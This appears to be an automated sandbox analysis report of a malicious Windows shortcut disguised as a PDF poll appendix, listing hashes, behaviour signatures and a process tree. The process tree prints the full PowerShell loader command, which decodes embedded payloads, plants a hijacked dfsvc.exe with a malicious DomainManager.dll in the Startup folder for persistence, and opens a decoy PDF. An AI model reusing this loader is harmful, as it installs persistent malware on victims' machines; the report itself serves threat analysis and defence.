Resubmissions

23/10/2024, 13:04

241023-qbdl4atckr 10

20/09/2024, 01:31

240920-bxp5pasejn 10

Analysis

  • max time kernel
    94s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/09/2024, 01:31

General

  • Target

    Quarterly Cambodia Poll Appendix.pdf.lnk

  • Size

    2.2MB

  • MD5

    23d55b0f6a502c7ed3a70d41272b0732

  • SHA1

    36a2c2cd63e3ca23a7934cfb3e7a957f2b5363f8

  • SHA256

    cfbd704cab3a8edd64f8bf89da7e352adf92bd187b3a7e4d0634a2dc764262b5

  • SHA512

    53984a522f5629f3bf64e62f9855254c74497388f0632e76b00fb16fba7b7fb45ffe2c0db7cd0e7016847f2a5d966e42b3081a47d6fc9a067c6bd0d9d9e752af

  • SSDEEP

    49152:zrdLymX/jNT7IBkZw3xFdyaxDadhCtbdMuC4vmYrl4GRGjEOaUJiuw:

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Quarterly Cambodia Poll Appendix.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk').Directory).Name+'\'+'Quarterly Cambodia Poll Appendix.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Quarterly Cambodia Poll Appendix.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](2298152);$k.Seek(2953,[IO.SeekOrigin]::Begin);$k.Read($b,0,2298152);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::WriteAllBytes($env:temp+'\e.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\e.pdf');
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3472
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\e.pdf
        3⤵
          PID:2264
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:1088

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_53hihdaz.5ko.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3472-2-0x00007FF9E6273000-0x00007FF9E6275000-memory.dmp

    Filesize

    8KB

  • memory/3472-12-0x00000289A0F90000-0x00000289A0FB2000-memory.dmp

    Filesize

    136KB

  • memory/3472-13-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

    Filesize

    10.8MB

  • memory/3472-14-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

    Filesize

    10.8MB

  • memory/3472-15-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

    Filesize

    10.8MB

  • memory/3472-16-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

    Filesize

    10.8MB

  • memory/3472-20-0x00007FF9E6270000-0x00007FF9E6D31000-memory.dmp

    Filesize

    10.8MB